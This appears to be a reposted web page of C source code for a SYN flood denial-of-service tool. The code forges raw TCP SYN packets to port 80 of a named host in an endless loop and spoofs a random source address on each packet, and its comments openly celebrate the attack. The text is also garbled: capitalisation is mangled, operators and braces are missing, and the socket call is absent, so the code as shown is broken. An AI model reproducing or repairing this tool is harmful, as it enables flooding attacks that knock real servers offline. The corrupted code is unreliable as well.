DDoS program source code

xiaoxiao2021-03-06  56

Dos.c / ************************************** /










#define destport 80 / * Port to attack port (web) * /

#define localport 8888

Void send_tcp (int sockfd, struct sockaddr_in * addr);

UNSIGNED Short Check_sum (unsigned short * addr, int LEN);

INT main (int Argc, char ** argv)


Int sockfd;

Struct SockAddr_in Addr;

Struct Hostent * Host;

INT ON = 1;

IF (argc! = 2)


FPrintf (stderr, "usage:% s hostnamena", argv [0]);

Exit (1);


Bzero (& Addr, Sizeof (Struct SockAddr_in);

Addr.sin_Family = AF_INET;

Addr.sin_Port = HTONS (DESTPORT);

IF (inet_aton (argv [1], & addr.sin_addr) == 0)


Host = gethostByname (Argv [1]);

IF (Host == Null)


FPrintf (stderr, "hostr," hostr:% sna ", hstrerror (h_errno));

Exit (1);


Addr.sin_addr = * (struct in_addr *) (Host-> h_addr_list [0]);


/ **** Use ipproto_tcp to create a TCP original socket **** /


IF (SockFD <0)


FPRINTF (stderr, "socket error:% sna", strrror (errno));

Exit (1);


/ ******** Set the IP packet format, tell the system kernel module IP packet by us, *** /

Setsockopt (SockFD, Ipproto_IP, IP_HDRINCL, & ON, SIZEOF (ON));

/ **** There is no way, only the super protecting users can use the original socket ********* /

SetUID (getPid ());

/ ********* Send a bomb !!!! **** /

Send_TCP (Sockfd, & Addr);


/ ******* Realization of the bomb ********** /

Void send_tcp (int sockfd, struct sockaddr_in * addr)


Char buffer [100]; / **** Used to place our packet **** /

Struct ip * IP;

Struct TCPHDR * TCP;

INT head_len;

/ ******* Our packets do not have any content, so the length is the length of the two structures *** /

Head_len = SizeOf (struct IP) sizeof (struct tcphdr); Bzero (Buffer, 100);

/ ******** Fill the head of the IP packet, remember the header format of the IP? ****** /

IP = (struct ip *) buffer;

IP-> ip_v = ipversion; / ** version is generally 4 ** /

IP-> ip_hl = sizeof (struct IP) >> 2; / ** IP packet head length ** /

IP-> ip_tos = 0; / ** Service Type ** /

IP-> ip_len = htons (head_len); / ** IP packet length ** /

IP-> ip_id = 0; / ** Let the system to fill in ** /

IP-> ip_off = 0; / **, like top, save time ** /

IP-> ip_ttl = maxttl; / ** maximum time 255 ** /

IP-> ip_p = ipproto_tcp; / ** We have to send TCP package ** /

IP-> ip_sum = 0; / ** Check and let the system do ** /

IP-> ip_dst = addr-> sin_addr; / ** We attacked objects ** /

/ ******* Started to fill in the TCP packet ***** /

TCP = (struct tcphdr *) (Buffer SizeOf (Struct IP));

TCP-> Source = HTONS (LocalPort);

TCP-> dest = addr-> sin_port; / ** destination port ** /

TCP-> SEQ = Random ();

TCP-> ACK_SEQ = 0;

TCP-> DOFF = 5;

TCP-> SYN = 1; / ** I want to establish a connection ** /

TCP-> CHECK = 0;

/ ** Ok, everything is ready. Server, you are ready ?? ^ _ ^ ** /

While (1)


/ ** You don't know if I am from there, go slowly! ** /

IP-> ip_src.s_addr = random ();

/ ** Everything makes the system, and there is not much meaning, let us check the head. * /

/ ** The following can be available without * /

TCP-> Check = Check_sum (UNSIGNED SHORT *) TCP,


Sendto (sockfd, buffer, head_len, 0, addr, sizeof);



/ * Below is the first verification algorithm, stealing others * /

Unsigned short check_sum (unsigned short * addr, int LEN)


Register int NLEFT = LEN;

Register int sum = 0;

Register short * w = addr;

Short answer = 0;

While (NLEFT> 1)


SUM = * W ;

NLEFT- = 2;


IF (NLEFT == 1)


* (UNSIGNED Char *) (& Answer) = * (unsigned char *) W;

SUM = answer;


SUM = (SUM >> 16) (SUM & 0xFFF);

SUM = (SUM >> 16);

Answer = ~ SUM;

Return (Answer);



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